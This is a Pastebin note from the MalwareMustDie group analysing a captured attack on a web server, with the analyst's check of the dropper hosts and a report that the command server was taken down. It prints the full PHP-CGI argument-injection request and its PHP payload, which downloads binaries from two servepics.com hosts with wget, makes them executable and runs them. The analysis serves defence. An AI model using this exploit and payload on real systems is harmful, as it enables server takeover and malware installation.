Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMustDie sCRAPnote
- // I'm a mu mu mu ? Is a lamer crap!
- POST /cgi-bin/phpinfo.php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
- Host: xxx.xxx.xxx.xxx
- User-Agent: I`m a mu mu mu ?
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 502
- Connection: close
- <?php
- $tmp = sys_get_temp_dir();
- $path = getcwd();
- $file = "e.html";
- $url = "http://eleven11root.servepics.com";
- system("wget $url -P - -O" . $tmp . "/e.html");
- system("chmod -R 777" . $tmp ."/e.html");
- chmod ($tmp."/".$file,0777);
- system($tmp . "/e.html");
- $file2 = "t.htm";
- $url2 = "http://twelfe12root.servepics.com";
- system("wget $url2 -P - -O" . $tmp . "/t.htm");
- system("chmod -R 777" . $tmp ."/t.htm");
- chmod ($tmp."/".$file2,0777);
- system($tmp . "/t.htm");
- echo $tmp;
- echo $path;
- die($tmp);
- / infected site dropped binaries /
- wget http://eleven11root.servepics.com -P - -O ./e.html
- wget http://twelfe12root.servepics.com -P - -O ./t.html
- / header checks /
- --2014-07-25 12:48:57-- http://twelfe12root.servepics.com/
- Resolving twelfe12root.servepics.com... 8.23.224.90
- Caching twelfe12root.servepics.com => 8.23.224.90
- Connecting to twelfe12root.servepics.com|8.23.224.90|:80... connected.
- Created socket 4.
- Releasing 0x00007fc878404890 (new refcount 1).
- GET / HTTP/1.1
- User-Agent: MMDBangsMyget/1.14 (MalwareMustDie12.2.1)
- Accept: **
- Host: twelfe12root.servepics.com
- Connection: Keep-Alive
- HTTP request sent, awaiting response...
- HTTP/1.1 302 Found
- Date: Fri, 25 Jul 2014 03:48:58 GMT
- Server: Apache/2.2.3 (CentOS)
- X-Powered-By: PHP/5.1.6
- Location: http://127.0.0.1
- Content-Length: 0
- Connection: close
- Content-Type: text/html; charset=UTF-8
- 302 Found
- Location: http://127.0.0.1 [following]
- Closed fd 4
- Connecting to 127.0.0.1:80... Closed fd 4
- failed: Connection refused.
- Releasing 0x00007fc878403ed0 (new refcount 0).
- Deleting unused 0x00007fc878403ed0.
- / Encryption analysis /
- %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
- / crack result /
- https://twitter.com/MalwareMustDie/status/492534140340682754
- / status /
- CNC was knocked down, @MMD Tango Team
- different case, same incident: http://pastebin.com/VePW1zGP
- #MalwareMustDie | cracked & reported by @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement